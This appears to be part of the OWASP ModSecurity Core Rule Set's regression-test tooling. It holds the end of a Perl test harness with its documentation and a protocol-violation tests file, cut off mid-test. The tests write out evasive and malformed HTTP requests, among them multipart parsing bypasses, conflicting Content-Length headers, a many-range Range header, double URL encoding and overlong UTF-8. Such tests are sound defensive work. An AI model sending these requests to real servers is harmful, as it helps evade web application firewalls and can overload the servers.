$test_events; foreach my $event (@{$test->{'event'}}) { if ($event =~ /^\!(.*)$/) { push @$test_events, "!\\[id \\\"$1\\\"\\]" } else { push @$test_events, "\\[id \\\"$event\\\"\\]" } } $test->{'match_events'} = !$test->{'mslog'} || check_match ($test->{'mslog'}, $test_events); my $result = ($test->{'match_status'} && $test->{'match_output'} && $test->{'match_audit'} && $test->{'match_events'}) ? "OK" : "FAIL" ; report_test ($outfile, $result, $test, $request, $vars); sleep $test->{'pause'} if $test->{'pause'}; } } sub check_match { my ($text, $patterns) = @_; my $match = 1; foreach my $pattern (@$patterns) { if ($pattern =~ /^\!(.*)$/) { return 0 if $text =~ /$1/sm; } else { return 0 if $text !~ /$pattern/sm; } } return $match; } sub report_header { my ($outfile, $outfilename) = @_; print $outfile "\nModSecurity rules test report generated to $outfilename on " . localtime() . "\n"; print $outfile "Produced by rulestest.pl, (c) Trustwave Holdings Inc, 2012\n"; } sub report_file_header { my ($outfile, $filename) = @_; print $outfile "\n## reading tests file $filename\n"; } sub report_test { my ($outfile, $result, $test, $request, $vars) = @_; print $outfile "\n" if $result ne "OK"; print $outfile "$result: "; print $outfile "$test->{'name'}"; print $outfile " ($vars)" if $vars; print $outfile ", status = $test->{'response_status'}"; #print $outfile ", X-WAF-Event Match" if ($test->{'match_output'}); my (@events) = ($test->{'mslog'} =~ /\[id \"(\d+)\"\]/gim); print $outfile $#events < 0 ? ", no events received" : ", event(s) = " . (join ",", @events) ; if ($result eq "FAIL") { print $outfile "\n"; if (!$test->{'match_status'}) { print $outfile "Expected status code(s): " . (join ",", @{$test->{'status'}}) . "\n"; } if (!$test->{'match_events'}) { print $outfile "Expected event(s): " . (join ",", @{$test->{'event'}}) . "\n"; } if (!$test->{'match_audit'}) { print $outfile "Audit does not match\n"; } if (!$test->{'match_output'}) { print $outfile "Output does not match\n"; } #$test->{'match_events'} && print "Events: $test->{'response_status'} and not " . (join ",", $test->{'status'}) . "\n"; print_details ($test) if $test->{'verbose'} || $test->{'relevant'}; } print $outfile "\n"; print_details ($test) if $test->{'verbose'}; } sub print_details { my ($test) = @_; print $outfile "---------\nRequest:\n$test->{'request'}\n"; print $outfile "---------\nResponse:\n$test->{'response'}\n"; print $outfile "---------\nLog:\n$test->{'mslog'}\n" if ($test->{'mslog'}); print $outfile "---------\nDebug:\n$test->{'msdebug'}\n" if ($test->{'msdebug'}); } sub generate_vectors { my ($script, $vars, $verbose) = @_; my $test_requests = []; my $vectors = [ {} ]; while (my ($var, $values) = each %$vars) { next if $var =~ /^_OVERRIDE_/; next if $script !~ /\$$var\b/; foreach my $vector (@$vectors) { $vector->{$var} = $values->[0]; } if ($#$values > 0) { my $collect_vectors = []; shift @$values; foreach my $value (@$values) { my $new_vectors = dclone $vectors; foreach my $vector (@$new_vectors) { $vector->{$var} = $value; } push @$collect_vectors, @$new_vectors; }; push @$vectors, @$collect_vectors; } } $script =~ s/\$([a-zA-Z_]+)/\$vector->{$1}/g; #print "SCRIPT=>$script\n"; my $results; foreach our $vector (@$vectors) { my $var = join ",", map { "$_=$vector->{$_}" } keys %$vector; $vector->{'CONTENT_LENGTH'} = '$CONTENT_LENGTH'; my $result; if (!defined($result = eval_expression ($script, $vector, $verbose))) { print STDERR "Error 109: unable to fuzz request. Not fuzzing test.\n"; return ({'' => $script}); } #my $req = HTTP::Request->parse($result); my ($content) = $result =~ /.*?\x0D\x0A\x0D\x0A(.*)/sm; $vector->{'CONTENT_LENGTH'} = length $1; $result = eval_expression ($script, $vector, $verbose); $results->{$var} = $result; } return $results; } sub eval_expression { my ($script, $vector, $verbose) = @_; $script =~ s/([\"\@\%])/\\$1/g; my $result; my $warn; local $SIG{__WARN__} = sub { $warn = $_[0] }; eval { my $safe = new Safe; $safe->share ('$vector'); $result = $safe->reval ("return \"$script\""); }; if ((my $error = $@) || $warn) { print STDERR "Error 108: unable to evaluate expression\n"; print STDERR "SCRIPT: $script\n" if $verbose; print STDERR "EVAL ERROR: $error\n" if $error && $verbose; print STDERR "EVAL WARNING: $warn\n" if $warn && $verbose; return undef; } return $result; } sub tchomp { my ($text) = @_; $text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s; return $text; } __END__ =head1 NAME rulestest.pl =head1 SYNOPSIS rulestest.pl [options] [test files ...] This program reads and executed tests in input test file(s) agains a ModSecurity protected web application. use -help for options. use -man for detailed usage information. =head1 OPTIONS the following options can be used either on the command line or (using the long version) as directives (prefixed by %) in test files. -s or -server <address>[:<port>] address of server to send. Mandatory before any test, but can appear in the test files themselves -p or -port <port> port to send tests to, defaults to 80 -t or -timeout <time> time in seconds, possibly fractional, to wait for server response. If the server does not respond within this period the test fails. the default is 10 seconds. Timeout should be small for synthetic tests, such as those generated from capture files as the server would respond fast. The timeout may need to be longer for real world servers. -f or -fuzz Whether to use fuzzing or not. You may not want to use fuzzing in case the requests where generated automatically and may includes syntax that will be considered by rulestest as substitutable variables. -mslog <file name> ModSecurity log file to search for events in. If not specified events are not (useful if tests are not run locally). -msdebug <file name> ModSecurity debug file to extract debug information to test report. If not specified, debug information is not add to the report. -o <file name> name of output file. Defaults to STDOUT. Not relevant as directive in test files. -i <file name> Names of input files. can also appear as parameters on the command line. Not relevant as directive in test files. -check Does not run test but only parses the input file -run <regular expression> a regular expresion to select tests to perfrom. Only tests whose name match the regular expression are executed. The option (or directive) can be used multiple times, so a test matching any of the regular expressions will be executed. -from <regular expression> a regular expression selecting the first test to perform. -r or -relevant Detailed information in the test report in case of a test failure. -v or -verbose Detailed information for all tests. Verbose will also cause specific errors to include print more information. -c or -clean deletes log and debug files and restart apache (using apachctl). Significantly enhance performance of the tests and can be used as many times as needed in test files. Clean is executed once, when starting the 1st test after it is defined regardless of the scope it is defined at. Specifically it will remove the log and debug files as defined when the test start: this enables the use of -clean on the command line even though file locations are defined only later on, for example in rulestest.conf. =head1 INSTALLATION & CONFIGURATION Test should be run from the same host ModSecurity runs on, or a computer that has file system access to ModSecurity audit log to. This allows rulestest to examine ModSecurity audit log for events and extract information from ModSecurity debug log to the test report. In order to test for events, ensure that ModSecurity is set use serial logging. =head2 Local and Global Settings: When used in a file, directives are local to the file, and when used whithin a test they are local to a test. To specify global settings preced the directive wiht the keyword global: %global server 127.0.0.1:80 if a file with the name rulestest.conf exists in the same directory as the script, it will be read. I can contain any directive valid in a test file. It can be used to set default =head2 Binary Attrbiutes: Directives that except a yes/no value can be set in varios ways. Providing the value 0 or 1 will set them to no and yes respectively. The directive without any values is eqvivalent to setting it to 1, and the directive preceded by "no" is eqvivalent to 0, for example: %noverbose will set the current scope to not report verbosely. =head2 Default Settings: The file rulestest.conf is automatically read by rulestest.pl before any tests file and may contain global setup directives. You may especially want to set there settings such as %server, %mslog and %msdebug as well as reporting level using %verbose and %relevant. =head1 WRITING TESTS To write a test use the following directives: =head2 defining the test request %test <name> - starts a test and set is name as shown in the report %endtest - used to terminate a test. Ususally there is no need to use this directive as the next %test directive implicitly defines the end of a test. You may want to use it if you want to set additional file level settings for the remaining tests. %remark - Ignore all lines (including directives) until a matching %endremark directive. use # at the beginning of a line to add a remark line to the file, if not in the middle of a multi-line directive such as %request. %request - multiple lines of the request should appear on the lines follwing the directive terminated by the next =directive (a line starting with "%"). Do not forget to leave an empty line as required by HTTP. You can use the special variable $CONTENT_LENGTH to have rulestest set the correct content length for the request. $CONTENT_LENGTH can save counting, but its main use is to enable fuzzing of requests with variables in the post data. %uri - a uri to send to the server. it would be embedded in a standard request %pause - define a delay in seconds after the test and before the next test. Useful if the feature tested involves timeouts. either a %uri or a %request directive must appeat in a test. A %request or a %uri can include variables using perl notation ($varname). this would be replaced when testing with a value set by the %var directive. Empty lines are skipped if not in the middle of multi-line directives such as %request. =head2 defining expected output %status <regexp> - The expected response status code(s). %event <regexp> - A regexp that should match event ids generated by the test in the audit log. %audit <regexp> - A regexp that should match in the audit log of the test. %output <regexp> - A regexp that should match in set a string to search in the HTTP response. You can use multiple directives to define many required patterns. for %event, %audit and %output you can use multiple directives to define many required patterns. All of them must match for the rule to match. Use the regular expresion or (|) option to check for at least one option from a group of patterns. Each regular expression can be preceded by a "!" mark to negate the test. the regular expression following must not appear in the test result. =head1 REPORTING By default rulestest will provide brief message describing if the test succeded in any of the checks done: status code, events generated, pattern in audit log and pattern in response. the following directives allow control on the level of details of the report: %verbose - from the test for which the directive appears onward, output request, reply and new ModSecurity audit log lines for each test. set to 0 to stop (1 is implicit on set). %relevant - from the test for which the directive appears onward, output verbose output for tests that failed any check. set to 0 to stop (1 is implicit on set). In most cases, you will only be interested in the failed tests. In that case, you can use awk with the following command: gawk '$1=="OK:" {printme=0}; $1=="FAIL:" {printme=1}; $1=="##" {printme=1}; printme==1 {print}' =head1 VARIABLE SUBSTITUTION (FUZZING) The directive "%var variable=value[, value[, valueM-^E..]] sets values for a variable which are embedded in the request sent. The test would be repeated using every value. Values are set only for the current test. Use the %globalvar directive to set global variables. Multiple %var directives for the same variable add values to the list and do not replace values, so: %var variable=value1 %var variable=value2 Would test with both value1 and value2. If multiple variables are used in the same test, than the test is carried for each combination of values of the variables: %var var1=v1, v2 %var var3=v3, v4 The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4), (v2, v3), (v2, v4). As noted before, the special variable $CONTENT_LENGTH can be used to automatically calculate the content length based on the actually generated request after variable substitution. =head1 TESTING RESPONSES In order for outbound tests the script testserver.cgi has to be installed in the web server's /cgi-bin directory. To force response content in request, use /cgi-bin/testserver.cgi as the target URL and add one or more of the following headers to the reuqest: Response-Status: - Force a response status line. Defaults to "200 OK". Response-Content: - Adds the string to the response. Note that this would not be the entire response. Response-Content-Type: - sets the value of the content type header, defaults to "text/html" Response-Header-Name: - Adds a header to the response. This defined the new header's name. Response-Header-Value defines the header's value. Response-Header-Value: - The value of the new header defined by the request header Response-Header-Name. Note: If Response-Header-Name is empty, then this parameter will be ignored. =head1 ERRORS Error 101: test file <file> not found. Check that all options are valid and no option was considered a test file. Error 102: syntax error in file <file> on line <line>. a line which is not a remark, not a directive and not in any multiline section (request and multi line remark) was found at specified line and file. Error 103: cannot use both %request and %uri. Only one of these directive can be specified in each test. Error 104: error connecting to server. The specific error is also displayed. This error usually implies a communication problem or specificaiton of a wrong server or port. Error 105: Error occured when trying to open a tests file. Tests will continue with next tests file. Error 106: Error occured when trying to create report file. Error 107: %endtest directive without a preceding %test directive Error 108: The expression evulator (using Perl eval function) failed. The expression probably includes some Perl syntax. use -verbose to print the actual error returned. Error 109: Fuzzing the request failed. This probably implies that the test request includes some Perl syntax. You may want to use the nofuzz option to overcome the problem. =cut ������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests/�������������������������������0000775�0000000�0000000�00000000000�12164572564�0026163�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_20_protocol_violations.tests��������������������������������������������������������0000775�0000000�0000000�00000050722�12164572564�0037110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 20 - protocol violations %test Invalid HTTP Request Line (960911) - Test 1 ##################################################### %remark This test has a TAB character before the request method. %endremark %status 400|403 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid HTTP Request Line (960911) - Test 2 ##################################################### %remark This test uses backslashes instead of forward slashes. %endremark %status 400|403 %request GET \\index.html HTTP\1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid HTTP Request Line (960911) - Test 3 ##################################################### %remark This test has a pipe character before the request method. %endremark %status 400|403|501 %output 960911 %request |GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Attempted multipart/form-data bypass (960000) ##################################################### %remark This test attempts form name parsing evasion using '. %endremark %output 960000 %request POST /cgi-bin/fup.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/upload.html Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 Content-Length: $CONTENT_LENGTH -----------------------------627652292512397580456702590 Content-Disposition: form-data; name=x';filename="';name=contact.txt;" Content-Type: text/plain email: security@modsecurity.org -----------------------------627652292512397580456702590 Content-Disposition: form-data; name="note" Contact info. -----------------------------627652292512397580456702590-- %test Failed to parse request body (960912) ##################################################### %remark Part missing Content-Disposition header %endremark %output 960912 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Contt-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Multipart request body failed strict validation (960914) ##################################################### %output 960914 %remark Invalid Quoting %endremark %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name='name; filename="'; name=payload;" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Multipart parser detected a possible unmatched boundary (960915) ##################################################### %remark Unmatched final boundary %endremark %output 960915 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915725-- %test Invalid Request Body (960000) ##################################################### %remark Invalid Quoting %endremark %output 960000 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name="fi;le"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Invalid Request Body/XML (960912) ##################################################### %remark Incorrect ending error tag </err> %endremark %output 960912 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: text/xml Content-Length: $CONTENT_LENGTH <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <SOAP-ENV:Body> <xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2"> <xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism> <xkms:RespondWith>http://www.w3.org/2002/03/xkms#X509Cert</xkms:RespondWith> </xkms:StatusRequest> </SOAP-ENV:Body><error></err> </SOAP-ENV:Envelope> %test Content-Length HTTP header is not numeric (960016) ##################################################### %remark When Apache received multiple headers with the same name, it will contat them into one header with commas separating the individual payloads. %endremark %status 413|400 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 3 Content-Length: 3 abc %test Content-Length HTTP header is not numeric (960016) ##################################################### %remark Content-Length should only contain digits. This has a semi-colon. %endremark %status 413|400 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 3; abc %test GET or HEAD Request with Body Content (960011) ##################################################### %remark This request sends a request body while using a GET request. %endremark #%status 400 %output 960011 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH abc %test POST request missing Content-Length Header (960012) ##################################################### %output 960012 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded %test Invalid Use of Identity Encoding (960902) ##################################################### %output 960902 %event 960902 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Encoding: Identity %test Expect Header Not Allowed for HTTP 1.0 (960022) ##################################################### %output 960022 %event 960022 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Expect: 100-continue %test Pragma Header requires Cache-Control Header for HTTP/1.1 requests (960020) ##################################################### %output 960020 %event 960020 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Pragma: no-cache %test Range: field exists and begins with 0 (958291) ##################################################### %output 958291 %event 958291 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Range: bytes=0- %test Range: Invalid Last Byte Value (958230) ##################################################### %output 958230 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: close %test Range: Too many fields (958231) ##################################################### %output 958231 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: close %test Multiple/Conflicting Connection Header Data Found (958295) ##################################################### %output 958295 %event 958295 %var connection=keep-alive %var connection=close %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: $connection, $connection %test URL Encoding Abuse Attack Attempt (950107) ##################################################### %output 950107 %event 950107 %var encoded_arg=%1G %var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request GET /?parm=$encoded_arg HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Multiple URL Encoding Detected (950109) ##################################################### %output 950109 %event 950109 %var encoded_arg=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34 #%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request GET /?parm=$encoded_arg HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test URL Encoding Abuse Attack Attempt (950108) ##################################################### %output 950108 %event 950108 %var encoded_arg=%1G %var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH param=$encoded_arg %test URL Encoding Abuse Attack Attempt/XML (950108) ##################################################### %output 950108 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: text/xml Content-Length: $CONTENT_LENGTH <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <SOAP-ENV:Body> <xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2"> <xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism> <xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith> </xkms:StatusRequest> </SOAP-ENV:Body> </SOAP-ENV:Envelope> %test UTF8 Encoding Abuse Attack Attempt (950801) ##################################################### %output 950801 %var arg=%c0%af %var arg=%c0 %var arg=%F5%80%BF%BF %request GET /?param=$arg HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Unicode Full/Half Width Abuse Attack Attempt (950116) ##################################################### %output 950116 %request GET 